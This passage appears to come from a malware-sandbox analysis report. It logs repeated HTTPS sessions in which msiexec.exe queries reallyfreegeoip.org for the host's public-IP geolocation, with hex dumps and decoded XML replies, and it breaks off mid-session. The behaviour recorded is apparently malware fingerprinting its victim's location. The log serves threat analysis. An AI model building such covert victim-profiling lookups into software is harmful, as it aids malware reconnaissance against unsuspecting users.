                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 2e 81 e1 76 89 0b 39 66 12 57 ea 1e a9 02 3b f1 9d b0 a8 f8 dc ee 21 0e 7f 2f ed 0c 0a 34 db 10 8d 4a 27 5d 44 7b 34 12 e3 2f d6 24 26 6e 6d a7 e7 0b 8a 93 09 67 f0 14 7a 2d 7c d1 75 2e 7a 96 1c dc 5d 7e e3 30 dc 0f b0 27 55 72 a2 70 81 79 99 ec aa 07 08 b3 a0 01 8b 9f e2 9c c6 ff 4f de 78 81 ac 33 6e a0 22 1c aa ef 28 9b fb 69 a6 f6 9c e4 2d 9d a8 38 2d 0c e6 0c 97 69 c6 14 3f 0a d2 82 82 24 04 f6 b2 8c 76 ec da fb 41 cb d7 32 61 c0 37 e3 9d 0a cb 69 69 e4 f8 3b 21 7f 2f c5 87 aa b5 d2 33 73 d2 d8 4c 3b 72 19 f5 5c 03 de 0e 79 97 f2 b7 6d 12 9e 70 24 65 64 fa bc a2 c3 24 81 1d f5 ae 77 4d dd 5b 16 02 95 71 8d e5 a6 93 4a 25 3f aa 0a d2 e1 6a 90 ce cf a8 b3 e0 bb bf 43 20 9c d4 9e 55 1b 35 63 eb d4 c3 bd e6 94 0f 97 57 46 19 2d f9 db 1e 9f 4f 5e 88 f1 5b
                                                                                                                                                                          Data Ascii: .v9fW;!/4J']D{4/$&nmgz-|u.z]~0'UrpyOx3n"(i-8-i?$vA2a7ii;!/3sL;r\ymp$ed$wM[qJ%?jC U5cWF-O^[


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.449806104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:29 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:29 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351978
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7njDdXEFmje0rGQaPp0ITXKqqCWteDJC6%2F2JrRucZh%2FykN2jZ7T7BJTcZIoXHSvqC%2Bu1UwKQ4aw3MXdP%2Fhh%2FhL8wBgANwJL9uxhgRyNqgWirl2x7oMHL55xA4ZpM7zAPnTbFxfAI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbb6b9abd7d13-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1793&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1556503&cwnd=252&unsent_bytes=0&cid=bff1cf01b5e8c277&ts=465&x=0"
                                                                                                                                                                          2024-12-16 15:33:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.449812104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:31 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2024-12-16 15:33:31 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:31 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351980
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMONQ7ooViY0XEe9OZF0ujrbp0bzg%2Fxe7tb7CixovYae%2FkGNImui9Mlp%2BcpqDeIAG92pxjlmdkKqKb04biSeVdZeeG3Jr1j5vFhCNeN0B4Won%2F6Uz0QZfVfN5iLJiG1hC82yC%2Fox"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbb78bdcf421c-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1605&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1740166&cwnd=252&unsent_bytes=0&cid=ff127ae843af9ac6&ts=482&x=0"
                                                                                                                                                                          2024-12-16 15:33:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.449824104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:34 UTC874INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:34 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351983
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDKEgMVIZpAzgGZYYhATz9qIxqAmVh3pWIiNCDUwU9PyTJqrYUDdYhdiSOeRzH%2Bh1OwccwQ7D2cuhNNzg%2BfdriR85Ij6VrIDZajwPhpsVT18EpukGqbejwtV8cZaM2cVTFn7RNqa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbb8c1a2a19cf-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1821&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1561497&cwnd=252&unsent_bytes=0&cid=e3ae97fb04f27d30&ts=487&x=0"
                                                                                                                                                                          2024-12-16 15:33:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.449831104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:37 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2024-12-16 15:33:38 UTC870INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:37 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351986
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jyYBcz9u7uvbB64AC5Flkx2LhaME772d9hThXUkZQn05mzZYTgP8hoSritYzNAzecMbnOKvCG2tPn91XYeCT3kvZr3ICwoLJXyRCcCQzm747NZYHWsirC9jezT5tPNQP9ADgoJ2g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbba02da6c407-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1526&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1858688&cwnd=197&unsent_bytes=0&cid=ebf5759f9aa169fb&ts=478&x=0"
                                                                                                                                                                          2024-12-16 15:33:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.449840104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:41 UTC874INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:41 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351990
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYfnxbWhsys14J4UhoKnYgE0hnz70zS%2B8NhrXbDbCk4JobZE3WCXxiH5NGK8WzvSgxArLNCG9pDCWrgGCJ93t24erOm5nGWkY1XveOTHzbPeA%2BxqT2kjBNL4g2yThC7JkkfnL7Gx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbbb4fff88cb3-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1950&rtt_var=744&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=226&unsent_bytes=0&cid=d77ce3d7e3286e72&ts=503&x=0"
                                                                                                                                                                          2024-12-16 15:33:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.449848104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:44 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:44 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351993
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mya9dXZ5HlPnWExaeJhbiqyB6AWQEEyTUOlHp1ukFehYE09DvWbXVxEchmyJWOoyfoZ7JlFZPrb1qGeocKm06OKni8IUJxBOPYC7F5cDSYnTfeHpKihSwsH6eLNA5XRIj5XKk5JU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbbcadb4617e9-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=46658&min_rtt=34921&rtt_var=21479&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=83617&cwnd=232&unsent_bytes=0&cid=2a89befde1e1e08e&ts=718&x=0"
                                                                                                                                                                          2024-12-16 15:33:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          8192.168.2.449855104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:48 UTC878INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:47 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 351996
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7cz7XeifQ4DgPHlEQnq%2BnxaoUTR7gif9ufgY9j%2FxoIWn5agMZjUzUzcZsGCFEFX62TSV0aXcOBfoCl1K6tbrANktLGEiTGcx9QCDm4CS4N%2F0wj3Jm9SZ%2BY4MlshexcH7v8Oyj9HT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbbddebef7cfc-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1830&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1567364&cwnd=223&unsent_bytes=0&cid=0e6d353e17cb8ae6&ts=466&x=0"
                                                                                                                                                                          2024-12-16 15:33:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          9192.168.2.449867104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:51 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:51 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: MISS
                                                                                                                                                                          Last-Modified: Mon, 16 Dec 2024 15:33:51 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWLaLYnxgriaYeE7dK1Qe6BPTtknU2GMZ5uExLdDJrU%2BiwzwAk7r%2FZ4hP23jf3cLAwlCbDpJFS8B2S4OuoB9mmVOXyLGI5JnlDP9I89lJTatlJHR1eV1U1%2BKptfcKsPBOrucXaqf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbbf33e869c42-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7219&min_rtt=7204&rtt_var=2732&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=398525&cwnd=32&unsent_bytes=0&cid=d5f4fc84af10d6cf&ts=926&x=0"
                                                                                                                                                                          2024-12-16 15:33:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          10192.168.2.449874104.21.67.1524438000C:\Windows\SysWOW64\msiexec.exe
